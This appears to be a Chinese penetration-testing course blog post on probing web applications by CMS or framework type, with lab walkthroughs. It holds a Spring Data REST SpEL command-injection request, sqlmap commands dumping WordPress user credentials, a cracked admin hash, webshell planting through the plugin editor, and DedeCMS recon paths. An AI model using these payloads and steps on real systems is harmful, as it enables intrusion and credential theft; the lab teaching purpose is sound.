第43天-漏洞发现-WEB应用之漏洞探针类型利用修复

思维导图

在这里插入图片描述

相关概念

已知 CMS

如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的
是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用
白盒代码审计自行挖掘。

开发框架

如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对
应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审
计自行挖掘。

未知 CMS

如常见的企业或个人内部程序源码,也可以是某 CMS 二次开发的源码结构,针对此类的源码程序测
试思路:能识别二次开发就按已知 CMS 思路进行,不能确定二次开发的话可以采用常规综合类扫描
工具或脚本进行探针,也可以采用人工探针(功能点,参数,盲猜),同样在有源码的情况下也可以
进行代码审计自行挖掘

演示案例:

开发框架类源码渗透测试报告-资讯-thinkphp,spring

thinkphp

在这里插入图片描述

输入错误url,报错显示Thinkphp版本

在这里插入图片描述

同样

在这里插入图片描述

在这里插入图片描述

spring

vulhub靶场

在这里插入图片描述

在这里插入图片描述

payload

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

在这里插入图片描述

已知 CMS 非框架类渗透测试报告-工具脚本-wordpress

靶场地址https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe

采用WordPress CMS

在这里插入图片描述

wpscan 扫描

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

构造链接

http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a

使用sqlmap快开始跑

python sqlmap.py -u "http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" --dbs

在这里插入图片描述

python sqlmap.py -u "http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" -D "test" --tables

在这里插入图片描述

python sqlmap.py -u "http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" -D "test" -T "wp_users --columns

在这里插入图片描述

python sqlmap.py -u "http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" -D "test" -T "wp_users" -C "user_login,user_pass" --dump

在这里插入图片描述

admin

$P$Bj8Pp.mH8GIjcXQqp1ZuyRw7i4oV72.

md5 查询 ————————》12qwaszx

在这里插入图片描述

查一下后台地址,登录后台

在这里插入图片描述

在插件中添加一句话小马

在这里插入图片描述

在这里插入图片描述

蚁剑连接

http://124.70.71.251:47438/wp-admin/plugin-editor.php?file=comment-rating/comment-rating.php

在这里插入图片描述

在这里插入图片描述

获取到key

mozheaac6be9855cd7bd73e3af588587

已知 CMS 非框架类渗透测试报告-代码审计-qqyewu_php

分析~~~

在这里插入图片描述

未知 CMS 非框架类渗透测试报告-人工-你我都爱的 wg 哦~

实战

DedeCMS
查看版本信息
/data/ admin/ver.txt
默认后殆
/dede
爆后台路径
/data/mysql_error_trace.inc

弱口令
扫端口nmap -sV
后台备份文件压缩包

涉及资源:

https://vulhub.org/
https://wpvulndb.com/users/sign_up
https://github.com/wpscanteam/wpscan
https://github.com/ajinabraham/CMSScan
https://pan.baidu.com/s/1KCa-5gU8R8jPXYY19vyvZA 提取码:xiao
https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值